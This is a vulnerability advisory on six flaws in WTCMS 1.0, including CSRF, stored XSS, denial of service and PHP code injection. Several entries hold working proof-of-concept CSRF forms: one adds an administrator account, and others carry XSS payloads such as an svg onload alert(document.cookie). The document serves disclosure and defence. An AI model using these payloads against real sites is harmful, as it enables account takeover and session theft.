Multiple vulnerabilities in WTCMS



Published: 2019-09-24
Risk High
Patch available NO
Number of vulnerabilities 6
CVE-ID CVE-2019-16719
CVE-2018-10267
CVE-2019-8910
CVE-2019-8911
CVE-2019-8909
CVE-2019-8908
CWE-ID CWE-352
CWE-79
CWE-400
CWE-94
Exploitation vector Network
Public exploit Public exploit code for vulnerability #1 is available.
Public exploit code for vulnerability #2 is available.
Public exploit code for vulnerability #3 is available.
Public exploit code for vulnerability #4 is available.
Public exploit code for vulnerability #5 is available.
Vulnerable software
Subscribe
wtcms
Web applications / CMS

Vendor taosir

Security Bulletin

This security bulletin contains information about 6 vulnerabilities.

1) Cross-site request forgery

EUVDB-ID: #VU21308

Risk: Low

CVSSv3.1: 5.8 [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C]

CVE-ID: CVE-2019-16719

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: No

Description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin in "index.php?g=admin&m=index&a=index". A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.

PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[host]/wtcms-master/index.php?g=&m=admin_page&a=index" method="POST">
      <input type="hidden" name="start&#95;time" value="" />
      <input type="hidden" name="end&#95;time" value="" />
      <input type="hidden" name="keyword" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;&lt;a&#32;src&#61;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

wtcms: 1.0

External links

http://www.iwantacve.cn/index.php/archives/344/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

2) Cross-site request forgery

EUVDB-ID: #VU21313

Risk: Low

CVSSv3.1: 5.8 [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C]

CVE-ID: CVE-2018-10267

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: No

Description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin in the "index.php?admin&m=user&a=add_post" URI. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as add an administrator account.

PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[host]/index.php?g=admin&m=user&a=add_post" method="POST">
      <input type="hidden" name="user&#95;login" value="hacker1" />
      <input type="hidden" name="user&#95;pass" value="hacker1" />
      <input type="hidden" name="user&#95;email" value="123&#64;qq&#46;com" />
      <input type="hidden" name="role&#95;id&#91;&#93;" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

wtcms: 1.0

External links

http://github.com/taosir/wtcms/issues/1


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

3) Cross-site request forgery

EUVDB-ID: #VU21312

Risk: Low

CVSSv3.1: 5.8 [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C]

CVE-ID: CVE-2019-8910

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: No

Description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin in the "index.php?g=admin&m=setting&a=site_post". A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as obtain administrator cookie.

PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[host]/index.php?g=admin&m=setting&a=site_post" method="POST">
      <input type="hidden" name="options&#91;site&#95;name&#93;" value="test" />
      <input type="hidden" name="option&#95;id" value="10" />
      <input type="hidden" name="options&#91;site&#95;admin&#95;url&#95;password&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;tpl&#93;" value="default" />
      <input type="hidden" name="options&#91;site&#95;adminstyle&#93;" value="flat" />
      <input type="hidden" name="options&#91;site&#95;icp&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;admin&#95;email&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;tongji&#93;" value="&lt;script&gt;alert&#40;&quot;test&quot;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="options&#91;site&#95;copyright&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;title&#93;" value="�&#191;&#189;�&#184;�&#187;�&#191;&#189;�&#161;�&#191;&#189;" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;keywords&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;description&#93;" value="" />
      <input type="hidden" name="options&#91;urlmode&#93;" value="0" />
      <input type="hidden" name="options&#91;html&#95;suffix&#93;" value="" />
      <input type="hidden" name="options&#91;comment&#95;time&#95;interval&#93;" value="60" />
      <input type="hidden" name="cmf&#95;settings&#91;banned&#95;usernames&#93;" value="" />
      <input type="hidden" name="cdn&#95;settings&#91;cdn&#95;static&#95;root&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

wtcms: 1.0

External links

http://github.com/taosir/wtcms/issues/5


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

4) Stored cross-site scripting

EUVDB-ID: #VU21311

Risk: Medium

CVSSv3.1: 6.8 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C]

CVE-ID: CVE-2019-8911

CWE-ID: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Exploit availability: No

Description

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in the third text box (for the website statistics code). A remote attacker can permanently inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

wtcms: 1.0

External links

http://github.com/taosir/wtcms/issues/5


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

5) Resource exhaustion

EUVDB-ID: #VU21310

Risk: High

CVSSv3.1: 7.1 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:C]

CVE-ID: CVE-2019-8909

CWE-ID: CWE-400 - Resource exhaustion

Exploit availability: No

Description

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to the background verification code size can be controlled. A remote attacker can send a specially crafted dimensions for the verification code image, trigger resource exhaustion and perform a denial of service (DoS) attack.

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

wtcms: 1.0

External links

http://github.com/taosir/wtcms/issues/6


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

6) Code Injection

EUVDB-ID: #VU21309

Risk: High

CVSSv3.1: 9 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C]

CVE-ID: CVE-2019-8908

CWE-ID: CWE-94 - Improper Control of Generation of Code ('Code Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation in a ".php" filename and the "Content-Type: image/gif" header. A remote attacker can send a specially crafted request and execute arbitrary PHP code by going to the "Setting -> Mailbox configuration -> Registration email template" screen, and uploading an image file.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

wtcms: 1.0

External links

http://github.com/taosir/wtcms/issues/3


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.



###SIDEBAR###